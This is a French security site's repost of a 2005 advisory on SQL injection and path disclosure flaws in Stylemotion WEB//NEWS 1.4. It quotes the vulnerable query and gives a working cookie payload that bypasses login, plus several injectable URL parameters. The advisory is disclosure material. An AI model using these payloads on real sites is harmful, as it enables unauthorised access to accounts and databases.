Chercher sur php.net


ground418 security
Chercher sur mysql



Voici la 187e page demandée aujourd'hui.
Img
Img2
Img3
Img4
Img6
Img7
Img8
Img9


Recherche


sur Internet
sur ground418




Alertes récentes
10-ForumCMS-JS
10-FlashSlideshowMaker-bufferOF
10-Canteen-fileInclude-SQLinject
10-getnnmdata-exec.txt
10-Sebo014-DoS
jaime mieux...

le php
l'asp
le perl
le html
le cafe noir


résultats
Exploits et Vulnérabilités logiciel sur ground418

Texte original (anglais) :

[NewAngels Advisory #5] Stylemotion WEB//NEWS 1.4

=============================================================================



Software: WEB//NEWS 1.4

Type: SQL Injections, Path Disclosure

Risk: High



Date: Sep. 1 2005

Vendor: Stylemotion





Credit:

=======

Robin 'onkel_fisch' Verton

http://www.it-security23.net



Description:

============

WEB//News is a Newsscript which features like an CMS





Vulnerability:

==============



In the modules/startup.php



$_USER=$db->first("SELECT * FROM ".PRE."_user LEFT JOIN ".PRE."_group USING (groupid)

WHERE

( userid='".$_COOKIE['wn_userid']."' AND password='".$_COOKIE['wn_userpw']."' )

LIMIT 1");



As we can see, the $_COOKIE paramter is not checked. Below i've added how you have to set the Cookies

to take advantage of these vulnerability (send this to index.php):



wn_userid=1; wn_userpw=0' OR '1'='1



Path Disclosure:

No file in he /actions dir is testet if it is directly included.

Example:

/actions/cat.add.php?name=A



Nearly every REQUEST variable is not checked so there are a few of SQL-Injections availiable



A few Examples:

/include_this/news.php?cat=[SQL]

/include_this/news.php?id=[SQL]

/print.php?id=[SQL]

/include_this/news.php?stof=[SQL]



Greets:

==============

Whole NewAngel Team, CyberDead, Modhacker, deluxe


Les avis les plus populaires de 2010
e107remote.txt
09-pyForum-backdoor
10-ForumCMS-JS
09-
06-alternC-095.txt
09-IPB-XSS
09-PhpShop-multi
09-jumi205
09-SMF-activeXSS
Statistiques pour
cet article :


AnnéeConsultations
2010636
2009261
2008211
20079

Total1117
partenaires